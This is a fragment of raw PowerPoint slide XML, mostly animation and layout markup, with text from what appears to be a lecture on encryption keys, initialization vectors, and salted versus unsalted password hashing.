                                      <p:cBhvr>
                                        <p:cTn id="141" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1119">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1119">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="143" presetClass="entr" nodeType="withEffect" presetSubtype="0" presetID="9" grpId="28" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="144" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1119">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="145" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1119">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="146" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="147" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="148" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="28" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="149" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1119">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="150" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1119">
                                            <p:txEl>
                                              <p:pRg st="1" end="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44" grpId="5"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="1118" grpId="1"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="1118" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1109" grpId="19"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1091" grpId="22"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1116" grpId="17"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1080" grpId="14"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1103" grpId="25"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1083" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1094" grpId="21"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1071" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1057" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1109" grpId="26"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1060" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1115" grpId="16"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1113" grpId="27"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1068" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1117" grpId="18"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1042" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1114" grpId="15"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1048" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1110" grpId="20"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1047" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1048" grpId="9"/>
      <p:bldP build="p" bldLvl="5" animBg="1" rev="0" advAuto="0" spid="1119" grpId="28"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1089" grpId="23"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1106" grpId="24"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1066" grpId="12"/>
    </p:bldLst>
  </p:timing>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3" name="Initialization Vector (IV) (cont.)"/>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Initialization Vector (IV) (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Encrypting “password” and “passw0rd” using the same IV and key…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Encrypting “password” and “passw0rd” using the same IV and key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="248355" indent="208844" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>password &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>?!@#fsg2</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="F70000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="248355" indent="208844" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>passw0rd &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>?!@#fc~;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="F70000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Generate a unique IV for each data set to be encrypted and store with the encrypted text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="248355" indent="208844" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>password &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>?!@#fsg2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>34</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="248355" indent="208844" defTabSz="1300480">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>passw0rd &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="F70000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>3^*p`453</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>56</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124">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">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9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1124">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124" grpId="1"/>
    </p:bldLst>
  </p:timing>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6" name="Encryption – Keys &amp; IVs"/>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Encryption – Keys &amp; IVs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1127" name="What is a “Key”?…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>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What is a “Key”?</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A “secret key” needs to be kept secret</a:t>
            </a:r>
          </a:p>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What is an “IV”?</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Initialization Vector</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“IV” don’t need to be kept secret</a:t>
            </a:r>
          </a:p>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How do you store the Key?</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It’s sensitive, so do you encrypt it with another key!?</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Where does it end!?</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1" name="Cryptographic Hash – Unsalted &amp; Salted"/>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Cryptographic Hash – Unsalted &amp; Salted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1134" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9688124" y="4289777"/>
            <a:ext cx="1634632" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1132" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1133" name="#45g.34g]f"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="155168" y="34459"/>
              <a:ext cx="1324295"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>#45g.34g]f</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1137" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4255911" y="3388924"/>
            <a:ext cx="1634632" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1135" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="passbob"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="273412" y="34459"/>
              <a:ext cx="1087807"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>passbob</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1140" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7137673" y="2784150"/>
            <a:ext cx="2066450" cy="1376935"/>
            <a:chOff x="0" y="11147"/>
            <a:chExt cx="2066448" cy="1376934"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1138" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="387499" y="403690"/>
              <a:ext cx="1282419" cy="984392"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Hash Algorithm"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="11147"/>
              <a:ext cx="2066449" cy="396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1300480">
                <a:defRPr sz="1800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Hash Algorithm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010204" y="3549226"/>
            <a:ext cx="1347894" cy="2325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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1144" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
